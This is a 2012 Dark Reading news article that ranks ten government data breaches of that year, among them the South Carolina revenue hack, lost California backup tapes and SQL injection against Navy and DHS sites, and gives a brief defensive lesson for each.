Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Application Security //

Database Security

04:26 AM

10 Top Government Data Breaches Of 2012

SQL injection, post-phishing privilege escalation, and poorly secured back-up information all played their part in exposing sensitive government data stores this year

With federal and local government agencies suffering the brunt of Anonymous protests, targeted phishing attacks leading to privilege escalation, and highly effective SQL injection attacks granting wide-scale access to information, citizen privacy definitely took a hit in 2012.

1. South Carolina
More than 3.3 million unencrypted bank account numbers and 3.8 million tax returns were stolen in a wide-ranging attack against the South Carolina Department of Revenue. Itt all started through a state employee falling for a phishing attack that enabled hackers to leverage that employee's access rights to gain access to the government entity's systems and databases.

Lessons Learned: Database protection layers, such as database activity monitoring, not to mention other network detection measures could have gone a long way toward minimizing the damage caused by the type of phishing attack that all organizations, public and private, face today.

[Find out where your privacy risk posture stands. See Free Risk Indexing Tool Offers Start For Assessments.]

2. California Department of Social Services
Sensitive payroll information about approximately 700,000 individuals was lost in the mail en route between IT contractors with Hewlett Packard and the California Department of Social Services. Information, such as caregiver and care recipient names, wages, and Social Security numbers, was exposed when package sent by U.S. Postal Service with microfiche containing the information was damaged with much of the data missing.

Lessons Learned: Databases are often most vulnerable when the information within them are put into more archaic forms like paper and microfiche. This breach proves that physical security and common sense still play a big role in data privacy protection.

3. Utah Department of Health
The health information and PII of more than 780,000 Utah citizens were put at risk when Eastern European hackers broke into a server maintained by the Utah Department of Technology Services this spring by taking advantage of poor authentication configuration following database migration to a new server.

Lessons Learned: Poor authentication controls, uneven patch management, and dicey configuration management add a inordinate amount of risk to the database protection equation.

4. California Department of Child Support Services
Californians suffered not one, but two huge breach events stemming from old-school data storage and questionable shipping of unobfuscated files. The California Department of Child Support Services lost more than 800,000 sensitive health and financial records when a FedEx shipment sent by the state's contractors with IBM and Iron Mountain containing backup tapes with the data in question fell off the proverbial truck.

Lessons Learned: Just because a database is on a backup tape or drive does not make the information contained within any less valuable or vulnerable. Protection of backup information needs to be accounted for within data protection policies.

5. United States Bureau of Justice Statistics
Anonymous embarrassed the United States Bureau of Justice Statistics (BJS) when it leaked 1.7 GB of sensitive data belonging to the bureau on The Pirate Bay this spring. Files included internal emails and a database dump with information from the BJS website.

Lessons Learned: While information stolen was generally publicly available anyhow, the database dump offers yet another example of how insecure Web applications put entire back-end databases at risk.

6. City of Springfield
Though government officials report that the number of citizens stung by a recent hack of the website run by the City of Springfield was only about 2,100, the perpetrators from Anonymous said they actually were able steal from municipal databases that included more than 1,000 vehicle descriptions from online police reports and records from more than 280,000 summons filed in city digital data stores. The grey hat hackers claimed to have more than they leaked to the public, reporting that they removed sensitive information as a public service to citizens.

Lessons Learned: Speculation on this one is that it was carried out through SQL injection. Even smaller municipalities are going to find themselves targets of SQLi attacks if they leave the Web app barn door open.

7. United States Navy & DHS
Hackers from a group calling itself Digital Corruption busted into Department of Homeland Security and U.S. Navy websites using Blind SQL injection attacks. They stole database information that included usernames, passwords, email IDs, and security questions and answers for all users on the Navy's Smart Web Move website and Homeland Security's Transportation Worker Identification Credential website.

Lessons Learned: As long as organizations fail to validate input in their Web applications, hackers will continue to run roughshod with these kinds of attacks.

8. Wisconsin Department of Revenue
South Carolina's tax authorities weren't the only government tax offices to suffer an embarrassing breach in 2012. In July, the Wisconsin Department of Revenue reported that it exposed sensitive seller information about more than 110,000 people and businesses who sold property in 2011 by allowing an unknown embedded file in a Microsoft Access file with public-facing sales data to go live with that information in a report that was available to real estate professionals from April through July.

Lessons Learned: Sometimes our databases' worst enemies aren't hackers, but, instead, unknowledgeable employees who put sensitive information in the most inopportune of places.

Although the 10,000 employees affected by the latest security lapse at NASA is fairly small compared to other big-number government privacy breaches this year, the circumstances offer glaring evidence of how government agencies still lag in employee awareness and training. Personally identifiable information was left on an unencrypted agency laptop, which was subsequently stolen from an employee's car on Halloween.

Lessons Learned: When large caches of information are transferred from the database, who knows where they'll end up. The NASA breach shows once again how easy it is for unencrypted information on laptops to "walk away" from authorized users.

10. New Hampshire Department of Corrections
In a case of the foxes running the hen house, the New Hampshire Department of Corrections found that inmates at a state correctional facility were able to access the main offender management database system. How so? That system was linked to a server that inmates working in the prison industries shops used. Access to the system would allow inmates to change items like parole dates and sentencing information, as well as view personally identifiable information on prison staff members.

Lessons Learned: This case offers a stark example of why uber sensitive databases require special segmentation measures to keep them safe from side-channel attacks.

Have a comment on this story? Please click "Add Your Comment" below. If you'd like to contact Dark Reading's editors directly, send us a message.

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
User Rank: Apprentice
12/7/2012 | 12:23:00 PM
re: 10 Top Government Data Breaches Of 2012
Really great and resourceful
article! I personally enjoyed it really much, maybe because it perfectly proves
our vital need for a Cyber Security Bill that has measurable accountability
controls and/or we suffer an attack that takes out our power grid or another
piece of critical infrastructure. I know there's a lot of fear mongering out
there which is unfortunate as it then becomes difficult for people to separate
the wheat from the chafe. I've been in the IT Security space for enough time to
understand how fragile our corporate and government infrastructure is. Actually,
hereGs an interesting article on this matter: http://blog.securityinnovation....
Hope you find it useful!-
US Formally Attributes SolarWinds Attack to Russian Intelligence Agency
Jai Vijayan, Contributing Writer,  4/15/2021
Dependency Problems Increase for Open Source Components
Robert Lemos, Contributing Writer,  4/14/2021
FBI Operation Remotely Removes Web Shells From Exchange Servers
Kelly Sheridan, Staff Editor, Dark Reading,  4/14/2021
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-04-23
Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse...
PUBLISHED: 2021-04-23
Authentication.logout() helper in com.vaadin:flow-client versions 5.0.0 prior to 6.0.0 (Vaadin 18), and 6.0.0 through 6.0.4 (Vaadin 19.0.0 through 19.0.3) uses incorrect HTTP method, which, in combination with Spring Security CSRF protection, allows local attackers to access Fusion endpoints after t...
PUBLISHED: 2021-04-23
Overly relaxed configuration of frontend resources server in Vaadin Designer versions 4.3.0 through 4.6.3 allows remote attackers to access project sources via crafted HTTP request.
PUBLISHED: 2021-04-23
Wowza Streaming Engine through 4.8.5 (in a default installation) has cleartext passwords stored in the conf/admin.password file. A regular local user is able to read usernames and passwords.
PUBLISHED: 2021-04-23
Wowza Streaming Engine through 4.8.5 (in a default installation) has incorrect file permissions of configuration files in the conf/ directory. A regular local user is able to read and write to all the configuration files, e.g., modify the application server configuration.